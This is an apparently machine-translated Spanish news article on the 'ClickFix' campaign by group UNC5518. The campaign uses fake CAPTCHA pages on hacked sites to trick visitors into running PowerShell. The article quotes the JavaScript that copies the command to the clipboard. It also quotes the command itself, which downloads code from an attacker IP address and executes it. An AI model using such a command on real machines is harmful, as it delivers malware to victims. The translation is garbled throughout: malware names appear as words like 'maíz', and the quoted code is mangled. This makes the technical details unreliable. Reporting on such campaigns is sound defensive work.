Ha surgido una sofisticada operación de delito cibernético, dirigido a usuarios de Internet desprevenidos a través de una técnica engañosa de ingeniería social que explota uno de los mecanismos de seguridad más confiables de la Web.
Desde junio de 2024, el grupo de amenazas de motivación financiera UNC5518 ha estado comprometiendo sistemáticamente sitios web legítimos para inyectar páginas de verificación Captcha falsas maliciosas, engañando a los visitantes para que ejecute sin saberlo en sus sistemas en sus sistemas.
La campaña de ataque, denominada “ClickFix” por los investigadores de seguridad, representa una forma particularmente insidiosa de ingeniería social que aprovecha la familiaridad de los usuarios con los desafíos de rutina de Captcha. Cuando las víctimas se encuentran con estas páginas de verificación fraudulenta, se les presentan lo que parece ser una interfaz de recaptcha estándar, completa con la casilla de verificación familiar “No soy un robot” y la marca Google.
Sin embargo, hacer clic en este elemento aparentemente inocuo desencadena una carga útil de JavaScript maliciosa que copia automáticamente un comando PowerShell al portapapeles del usuario.
Analistas de Google Cloud identificado que UNC5518 opera como un proveedor de acceso como servicio, asociado con múltiples grupos de amenazas afiliados para monetizar sus capacidades de compromiso inicial.
La infraestructura sofisticada del grupo admite varios actores aguas abajo, incluidos UNC5774, que se especializa en la implementación del maíz.
Ciclo de vida de ataque (fuente – Google Cloud)
La ejecución técnica de este ataque demuestra una notable atención al detalle al imitar las prácticas legítimas de seguridad web.
El JavaScript malicioso integrado en sitios web comprometidos crea una interfaz CaptCha convincente utilizando un código que se parece mucho a las auténticas implementaciones de Google Recaptcha.
Cuando las víctimas interactúan con el sistema de verificación falsa, el siguiente código se ejecuta en silencio en segundo plano:-
Document.getElementById (“j”). OnClick = function () {var ta = document.createElement (“textArea”); Ta.value = _0xc; Document.body.appendChild (TA); Ta.Select (); Documento (.) ExecCommand (“Copiar”);
Este script copia automáticamente un comando PowerShell cuidadosamente elaborado al portapapeles de la víctima, que aparece como: PowerShell -Wh -C “$ u = (int64) (((datetime) :: utcnow- (dateTime) ‘1970-1-1-1’). TotalSeconds)%0xffffffffffff0; Irm; Irm; 138.199.161 (.) 141: 8080/$ U | IEX “.
El comando está diseñado para descargar y ejecutar cargas de malware adicionales desde la infraestructura controlada por el atacante.
Mecanismo de infección y entrega de carga útil
La técnica ClickFix explota una debilidad crítica en los patrones de comportamiento del usuario, aprovechando la aceptación generalizada y la confianza asociados con los sistemas Captcha.
Una vez que el comando PowerShell malicioso se copia en el portapapeles, las víctimas generalmente reciben instrucciones a través de las indicaciones en pantalla que pegaran y ejecutar el comando utilizando el diálogo de Windows Run (Windows+R), creyendo que están completando un proceso de verificación legítimo.
Tras la ejecución, el script de PowerShell inicia una sofisticada cadena de infección de múltiples etapas que incluye medidas integrales contra el análisis.
El malware realiza comprobaciones de entorno para detectar máquinas y cajas de arena virtuales, examinando las configuraciones de memoria del sistema e información del fabricante para evadir los entornos de investigación de seguridad.
Si pasan estas verificaciones, el script descarga los componentes de tiempo de ejecución de Node.js de fuentes legítimas y despliega la puerta trasera de Cornflake.v3, que establece un acceso persistente a través de modificaciones de registro y permite actividades integrales de reconocimiento del sistema, incluida la enumeración del directorio activo y las técnicas de cosecha de credenciales de la cervatera.
Aumente su SOC y ayude a su equipo a proteger su negocio con inteligencia gratuita de amenazas de primer nivel: Solicitar prueba de prueba premium de búsqueda TI.
